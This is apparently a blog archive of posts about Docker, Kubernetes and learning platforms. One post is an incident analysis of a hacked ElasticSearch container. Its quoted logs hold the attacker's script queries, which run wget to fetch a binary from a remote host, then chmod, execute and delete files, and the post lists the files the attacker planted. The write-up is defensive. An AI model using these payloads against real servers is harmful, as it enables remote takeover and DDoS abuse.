Tips on solving E_TOO_MANY_THINGS_TO_LEARN with Kubernetes

At a recent Kubernetes London meetup, I showed highlighted some of the marvellous work happening within the Kubernetes Community and some tips on how to get started.

The slides are below:

 

The video of the presentation can be found at:
https://skillsmatter.com/skillscasts/9737-tips-on-solving-e_too_many_things_to_learn

All the demos were delivered via Katacoda, the interactive learning platform I founded. The links are here:
Minikube – https://kubernetes.io/docs/tutorials/kubernetes-basics/cluster-interactive/

Kubeadm – https://www.katacoda.com/courses/kubernetes/getting-started-with-kubeadm

Openshift – http://openshift.katacoda.com/katacoda-introduction/deploy-containers-using-cli/

Helm Package Manager – https://www.katacoda.com/courses/kubernetes/helm-package-manager

Weave Flux – https://www.weave.works/guides/cloud-testdrive-part-2-deploy-continuous-delivery/

Adding bash completion:

source <(kubectl completion bash)

Learn Docker 1.12 and Swarm Mode Interactively with Katacoda

Katacoda is an interactive technical learning platform for software developers. The platform provides environments that are uniquely accessible via the browser, with no need for configuration or download

With over 70 free interactive scenarios, people come to us to learn cloud-native technologies like Kubernetes and Docker.

We want to help people see the overall picture and enable users to start solving problems. To support with Docker 1.12 and Swarm Mode, we have put together five initial scenarios that explain how to run containers at scale.

Each scenario has a step-by-step tutorial to guide users on how to solve a particular problem and complete a task. Alongside this, we provision each user with a free Docker Cluster that’s accessible directly from your browser without any downloads or configuration within seconds. Starting learning at https://www.katacoda.com/courses/docker-orchestration/

While step-by-step guides highlight how to solve problems, sometimes it’s useful just to play. This is why we always include playgrounds. A space to experiment, try commands and see what happens. If it all goes wrong, hit refresh and be allocated a clean new cluster. Try it at https://www.katacoda.com/courses/docker-orchestration/playground

Katacoda has a range of courses, covering Docker in development and production, Container Security, Kubernetes and more! Visit https://www.katacoda.com/learn

Docker as an alternative to runtime version managers

While the usage of Docker in production has mixed reactions, it’s usage for development and continuous integration is overwhelming.

Having used Docker in development for the past two years my usage patterns has changed. To begin with I used Docker as an accessible way to have local instances of Redis or Postgres running on OSX or Windows. More recently I’ve been using it to run various language tools and environments instead of using version managers.

Version managers used to be a necessity. When maintaining more than a few applications, you would end up requiring more than one version of Ruby, Node, Java, etc running on your machine. Version managers made it simple to switch versions, but also become another thing to install and manage. When working with other developers, the problem of pinning to a particular version became harder to maintain. New starters would start with the latest version without realizing team’s current version.

Fast-forward to Docker and we can now have a practical and accessible approach for process isolation. I apply the same method to the various programming language runtimes. For example, when testing upgrading to Node v4 or Node v5 I used a Docker container to experiment without changing my environment.

This method became even more necessary with Golang. Different open source projects built against different versions. I found staying synced to the correct version with the correct configuration and path settings to be non-trivial. Version managers helped maintain my system but didn’t help me sync with others.

With Docker and a simple Bash command, you can launch the correct versions, with the directories mapped to particular locations and interact with it as if it was on your local machine. For example, the following command launches a Golang environment for my application.

docker run -it --rm
-w /go/src/github.com/$(NAME)
-v $(pwd)/vendor/github.com/:/go/src/github.com/
-v $(pwd):/go/src/github.com/$(NAME)
golang:1.4.2

The command maps the current directory to /go/src/github.com/. I store all the vendor dependencies in /vendor/ in source control, but remap them to a different location for the Golang runtime. I can run the same commands such as go get or go build as if Golang was on my host. When I upgrade, I just delete the docker image and pull down the correct version. Nothing else hanging around on my host.
Mark Rendle recently used this same approach for running the latest version of DotNet on different Linux distros called DockNet. By moving the runtime into a container, you have greater control, flexibility and shareability.

Want to see it in action? Load the Katacoda environment below. The editor has a simple “Hello World” application. Clicking Run will launch you into a Docker container, where you can run node, start the process and access the service like usual.

var http = require(“http”);
var requestListener = function (req, res) {
res.writeHead(200);
res.end(“Hello, World!”);
}
var server = http.createServer(requestListener);
server.listen(3000, function() { console.log(“Listening on port 3000”)});

Changing times at Cisco with Mantl, Contiv, Shipped and Cisco Cloud

Until recently I considered Cisco to be a company that focuses primarily on data centres and networking hardware. Last week and attending Cisco Live event made me change my mind. Times are changing! Cisco is changing.

The last three years have introduced dramatic changes to the infrastructure ecosystem. Container technology has become accessible. Scheduling platforms like Mesos are in use outside of the top SV companies. Automation of deployment process is possible with amazing tools like Terraform and Ansible. The style for microservices, or component-based architectures, has been born. Many developers will simply consider micro services to be another buzzword, a new term to think about known ways of architecting systems. While this is true, the latest conversations have relighted the risks of monolithic systems. They introduced new questions about deploying these components as globally distributed services.

These questions are causing many sleepless nights in developers world. The learning curve to understand all the moving parts is steep. Some days I believe to the point where it’s almost vertical. I’m currently working on solving this problem with Katacoda. It’s an interactive learning platform dedicated to helping developers understand this rapidly changing world.

Cisco and their partners are creating tools to answer similar questions. They consider issues like deployment distributed services and utilisation of available open source tooling. During Cisco Live the majority of the conversations gathered around the Cisco Cloud team. As the solution with support from Container Solutions, Remember to Play and Asteris, Cisco has built Mantl.

According to Cisco Mantl “is a modern platform for rapidly deploying globally distributed services“. From my perspective, it’s creating a best of breed platform. It combines the finest open source systems making them simple to deliver as end-to-end solutions. This aim is achieved without any vendor lock-in and by releasing the product under the Apache License. This way the platform fits into “Batteries Included But Removable” mindset.

Mantl is the glue to connect services and infrastructure together. Out of the box, it manages the provisioning of infrastructure and software using code artefacts. It manages deployments using Ansible and Terraform. This means supports the major cloud platforms. This continues by deploying your software onto a Mesos cluster, software defined networks via Calico, service discovery using Consul, and logging with the ELK stack, to name a few. All managed under source control, exactly where it should be.

Mantl Architecture

The architecture of building on top of existing tooling is significant. By not re-inventing the wheel, Mantl becomes an appealing platform as a combination of your existing go-to tooling.

Container Solutions, presented an impressive example on how to work with the platform. They have put together case study based system collecting data for localised fog predictions. Who doesn’t like IoT, big data and drones?

The resulting architecture like something we built for a previous client that involved predicting faults. In theory, if we had used Mantl then we’d have saved significant time and investment on our infrastructure work. We used the ELK stack, Consul and many other tools Mantl is based on meaning it would have felt similar. We’d also have gotten the benefits of running on top of Mesos/Marthon for free. As a result, the team could have spent more energy on data analytics instead of infrastructure.

Mantl provides an interesting future and direction. The container ecosystem is still young with no clear winner. Mantl’s approach feels sane as it’s agnostic to the underlying tooling. As a result, it has the potential to win the hearts and minds of many users.

But it’s not going to be an easy task. One of the main challenges I foresee is shielding users from the underlying complexity as the platform grows. It’s important to keep the initial setup a simple and a welcoming process. Another aspect would be educating users in using Kibana, Marthon, Vault, etc. once it’s up and running.

Ensuring the platform is easy to get started with is the key. I’m seeing too many platforms attempting long sales approach that’s putting developers off. Developers don’t want to jump through hoops to start playing with technologies. One of the worse things companies can do is force them to join a “Sales Call” to see if they’re suitable. The great aspect of Mantl is it’s open to everyone. By using familiar tooling like Ansible, Terraform and Vagrant, the platform allows you to get started quickly. Other “Control Planes” should take note.

Mantl wasn’t the only interesting project discussed during the conference. Shipped is a hosted CI/CD/PaaS platform that uses Mantl under the covers. Mantl provides deployment of your application onto a Mesos cluster in AWS and other cloud providers as it’s completely cloud agnostic.

What happens when an ElasticSearch container is hacked

Being hacked is an interesting experience. There are five stages to being hacked. The first is denial defining there is no way someone could hack you. The second is blame believing it was another problem and not hackers. The third is acceptance and wondering if you were hacked. The fourth is fear of what they did!? The final stage is investigate and the fun starts to find out what they did.

These stages happened to me after launching an ElasticSearch instance on a Digital Ocean droplet using Docker. An external service required the instance of Elasticsearch but for a demo and never intended for production use. The problem arised after forgetting to turn off the Docker container and the droplet instance. Here’s what happen next.

Digital Ocean get unhappy

The first sign of anything going wrong was an email from Digitial Ocean. The email indicated that they’ve terminated network access to one of my droplets.

In the control panel the bandwidth graph indicated high outbound bandwidth. At it’s peak it was over 500Mbps. This had all the hallmarks of a outgoing DDoS attack but no idea how they gained entry.

graph

With network access you can still control the droplet via Digital Ocean’s VNC console.

Investigating the hack

To start I performed the basic checks to see what went wrong. I checked for security updates nad processes running but nothing highlighted any issues. I ran standard debug tools such as lsof to check for open network connections and files but didn’t show anything. Turns out I rebooted the machine while attempting to regain access. This was a silly mistake as any active processes or connections closed. Part of the reason why Digital Ocean only remove network access is so you can debug the active state.

At this point I was confused. It’s then I looked towards the running Docker containers.

Analysing a Hacked Docker Instance

On the host I had a number of Docker containers running. One of these was the latest ElasticSearch.

After viewing the logs I found some really interesting entries. There were a higher number of errors than normal. These errors didn’t relate to the demo running and often they references to files in /tmp/. This caused alarm bells to start ringing.

What did the hackers do?

As ElasticSearch was running inside a container I could identify exactly the impact. I was also confident that the hack was contained and they didn’t gain access to the host.

The ElasticSearch logs gave clues to the commands executed. From the logs the hack attempt lasted from 2015-07-05 03:29:29,674 until 2015-07-11 06:54:02,332. This is likely to be when Digital Ocean pulled the plug.

The queries executed took the form of Java code. The code downloaded assets and then executed them.

org.elasticsearch.search.SearchParseException: [index][3]: query[ConstantScore(*:*)],from[-1],size[1]: Parse Failure [Failed to parse source [{"size":1,"query":{"filtered":{"query":{"match_all":{}}}},"script_fields":{"exp":{"script":"import java.util.*;\nimport java.io.*;\nString str = \"\";BufferedReader br = new BufferedReader(new InputStreamReader(Runtime.getRuntime().exec(\"wget -O /tmp/xdvi http://<ip address>:9985/xdvi\").getInputStream()));StringBuilder sb = new StringBuilder();while((str=br.readLine())!=null){sb.append(str);}sb.toString();"}}}]]
org.elasticsearch.search.SearchParseException: [esindex][4]: query[ConstantScore(*:*)],from[-1],size[-1]: Parse Failure [Failed to parse source [{"query": {"filtered": {"query": {"match_all": {}}}}, "script_fields": {"exp": {"script": "import java.util.*;import java.io.*;String str = \"\";BufferedReader br = new BufferedReader(new InputStreamReader(Runtime.getRuntime().exec(\"chmod 777 /tmp/cmd\").getInputStream()));StringBuilder sb = new StringBuilder();while((str=br.readLine())!=null){sb.append(str);sb.append(\"\r\n\");}sb.toString();"}}, "size": 1}]]
org.elasticsearch.search.SearchParseException: [esindex][2]: query[ConstantScore(*:*)],from[-1],size[-1]: Parse Failure [Failed to parse source [{"query": {"filtered": {"query": {"match_all": {}}}}, "script_fields": {"exp": {"script": "import java.util.*;import java.io.*;String str = \"\";BufferedReader br = new BufferedReader(new InputStreamReader(Runtime.getRuntime().exec(\"/tmp/cmd\").getInputStream()));StringBuilder sb = new StringBuilder();while((str=br.readLine())!=null){sb.append(str);sb.append(\"\r\n\");}sb.toString();"}}, "size": 1}]]

The hackers cared enough to clean up after themselves, which was nice of them.

org.elasticsearch.search.SearchParseException: [esindex][2]: query[ConstantScore(*:*)],from[-1],size[-1]: Parse Failure [Failed to parse source [{"query": {"filtered": {"query": {"match_all": {}}}}, "script_fields": {"exp": {"script": "import java.util.*;import java.io.*;String str = \"\";BufferedReader br = new BufferedReader(new InputStreamReader(Runtime.getRuntime().exec(\"rm -r /tmp/*\").getInputStream()));StringBuilder sb = new StringBuilder();while((str=br.readLine())!=null){sb.append(str);sb.append(\"\r\n\");}sb.toString();"}}, "size": 1}]]

As the attack was still running they didn’t get chance to remove all the files. Every Docker container is based off an image. Any changes to the filesystem are stored separately. The command docker diff <container> lists files added or changed. Here’s the list:

C /bin
C /bin/netstat
C /bin/ps
C /bin/ss
C /etc
C /etc/init.d
A /etc/init.d/DbSecuritySpt
A /etc/init.d/selinux
C /etc/rc1.d
A /etc/rc1.d/S97DbSecuritySpt
A /etc/rc1.d/S99selinux
C /etc/rc2.d
A /etc/rc2.d/S97DbSecuritySpt
A /etc/rc2.d/S99selinux
C /etc/rc3.d
A /etc/rc3.d/S97DbSecuritySpt
A /etc/rc3.d/S99selinux
C /etc/rc4.d
A /etc/rc4.d/S97DbSecuritySpt
A /etc/rc4.d/S99selinux
C /etc/rc5.d
A /etc/rc5.d/S97DbSecuritySpt
A /etc/rc5.d/S99selinux
C /etc/ssh
A /etc/ssh/bfgffa
A /os6
A /safe64
C /tmp
A /tmp/.Mm2
A /tmp/64
A /tmp/6Sxx
A /tmp/6Ubb
A /tmp/DDos99
A /tmp/cmd.n
A /tmp/conf.n
A /tmp/ddos8
A /tmp/dp25
A /tmp/frcc
A /tmp/gates.lod
A /tmp/hkddos
A /tmp/hsperfdata_root
A /tmp/linux32
A /tmp/linux64
A /tmp/manager
A /tmp/moni.lod
A /tmp/nb
A /tmp/o32
A /tmp/oba
A /tmp/okml
A /tmp/oni
A /tmp/yn25
C /usr
C /usr/bin
A /usr/bin/.sshd
A /usr/bin/bsd-port
A /usr/bin/bsd-port/conf.n
A /usr/bin/bsd-port/getty
A /usr/bin/bsd-port/getty.lock
A /usr/bin/dpkgd
A /usr/bin/dpkgd/netstat
A /usr/bin/dpkgd/ps
A /usr/bin/dpkgd/ss

With the help of log files it looks like they uploaded and executed one command. This proceeded to download and launch the DDoS attack, a popular command and control pattern.

Investigating the files

My debug skills only go so far but I did manage to find a few tip bits of information. Most of the times are statically linked, either "application/octet-stream; charset=binary" or "ELF 32-bit LSB executable, Intel 80386, version 1 (GNU/Linux), statically linked, for GNU/Linux 2.6.32, BuildID[sha1]=5036c5788090829d54797078db7c67a9b0571db4, stripped". It’s interesting to see the logs as you can spot them understanding if the OS is Windows or Linux.

The logs did highlight one source. Executed was wget -O /tmp/cmd http://<IP Address>:8009/cmd. This pointed towards a Windows 2003 server, running IIS, in China. This was likely hacked and then used as a distribution point.

The root cause

So what vulnerability did they exploit? It wasn’t an exploit, instead it used a feature of ElasticSearch. This demonstrates why you shouldn’t expose these types of services to the outside world. Docker makes it easy to expose services to the outside world but as a result it’s also easy to forget that people are looking for targets.

How the attack worked and the intended target is a little harder to understand. I’ve exported the container as an Docker image. If anyone is interested then please contact me and I’ll send you what I have.

Before the “Docker’s insecure” comments

If I had run the process on the host and opens the ports then it still would have been hacked. The only difference is they would have had access to the entire machine instead of just the container.

The reason why I was hacked is because I opened up a powerful database to the outside world to be accessed by other services.

I find it more interesting to consider how a new deployment approach like Docker could allow infrastructure to be secure by default. The future “Docker & Containers in Production” course on Scrapbook and my workshops will cover these aspects.

Lessons

There are three major lessons to be taken away from this.

1) Don’t expose public services to the internet without authentication. Even for a short period of time.

2) It’s important to monitor containers for malicious activity and strange behaviour. I’ll cover how Scrapbook (my current project) handles this in a future blog post.

3) Next time I want to have a sandboxed environment then I’ll use Scrapbook to spin up sandboxed learning environments.

September 2015 – Docker talk (London) and workshop (Oslo)

With the summer behind us we rejoin the conference season. September sees me  presenting at Container Camp in London and running a workshop in Oslo.

London. 11th September – https://container.camp/

My talk at Container Camp on “Lessons from running potentially malicious code inside containers“. The talk will share insights into Docker’s security model and the lessons from building the online learning environment Scrapbook.

Oslo, Norway. 24th September 2015. – http://programutvikling.no/en/course/deploying-docker-and-containers-into-development-and-production/

I’ll also be running a workshop with ProgramUtvikling, the team behind NDC. The title is “Deploying Docker and Containers Into Development and Production”.

During October and November I’ll be presenting at a few conferences in Europe. I have some extra capacity, please contact me if you’re interested in container-based consultancy or training.

 

Try Docker 1.8 RC with Scrapbook

I love playing and exploring new approaches and technologies and understanding why they’re different. Yet many of the upcoming technologies have a high barrier to entry which removes the fun of learning. As such we set out to put the fun back into learning new technologies with Scrapbook.

The aim of Scrapbook has been to make it easier to learn and play with new technologies. We recently released Docker scenarios to teach Docker with an online learning environment.

Docker just announced the new 1.8 RC release which you can now try with Scrapbook. We’ve created a playground that has the latest Docker daemon and client for you to use.

Docker 1.8 on Scrapbook

The playground is available at app.joinscrapbook.com/ben_hall/scenarios/docker_rc

For a limited time only the Docker course is available for free.

Setting Docker’s DOCKER_OPTS on Ubuntu 15.04

The recent release of Ubuntu (15.04) introduced Systemd as a replacement for Upstart. Systemd is the init system for Linux and starts all the required services.

With new systems comes new approaches. One of the main activities is customising the launch of services such as Docker.

With Upstart, extra Docker launch parameters like storage devices are set in /etc/default/docker. An example is 'DOCKER_OPTS="-H unix:///var/run/docker.sock"'

With Systemd, you need to update Docker’s service file to use the extra parameters via a EnvironmentFile.

Steps

1) Docker’s system file can located at /lib/systemd/system/docker.service

2) The ExecStart line defines how to start a service. By default this is ExecStart=/usr/bin/docker -d -H fd://

3) Include the line EnvironmentFile=/etc/default/docker above ExecStart

4) Update the ExecStart to use the variable created.
ExecStart=/usr/bin/docker -d -H fd:// $DOCKER_OPTS

The complete docker.service file should look like

[Unit]
Description=Docker Application Container Engine
Documentation=https://docs.docker.com
After=network.target docker.socket
Requires=docker.socket

[Service]
EnvironmentFile=/etc/default/docker
ExecStart=/usr/bin/docker -d -H fd:// $DOCKER_OPTS
MountFlags=slave
LimitNOFILE=1048576
LimitNPROC=1048576
LimitCORE=infinity

[Install]
WantedBy=multi-user.target

When the service starts it also includes the parameters defined in /etc/default/docker.

Two warnings:

1) If /etc/default/docker does not exist then it will fail to start

2) Every time you upgrade Docker the docker.service file is overridden meaning you need to repeat the above steps. This is why I find it useful to keep the variables in a separate file.

Docker’s Experimental Binary running in a Scrapbook Playground

As some of you are aware, I’m currently in the progress of building Scrapbook, an Interactive Learning Environment for Developers. The aim of Scrapbook has always been to make learning new technologies and frameworks easier and more interactive. By removing the need to download and configure the technologies you can jump straight into exploring while still having enough access and control to learn and break things in your own way.

Today Docker announced an easier way to try new bleeding edge features via an experimental binary.

“Docker’s experimental binary gives you access to bleeding edge features that are not in, and may never make it into, Docker’s official release.  An experimental build allows users to try out features early and give feedback to the Docker maintainers” http://blog.docker.com/2015/06/experimental-binary/

However experimental binaries by their very nature have unknown side-effects.

To make it easier for people to use the Docker Experimental Binary we’ve created a Playground on Scrapbook.  The playground has the latest version installed allowing you to explore the new features via your browser without having to download or install anything onto your local machine.

Docker experimental binary on Scrapbook

You can sign up for free at http://app.joinscrapbook.com/courses/docker-experimental/playground

If you want to learn more about the current features of Docker then take our interactive online course at http://app.joinscrapbook.com/courses/docker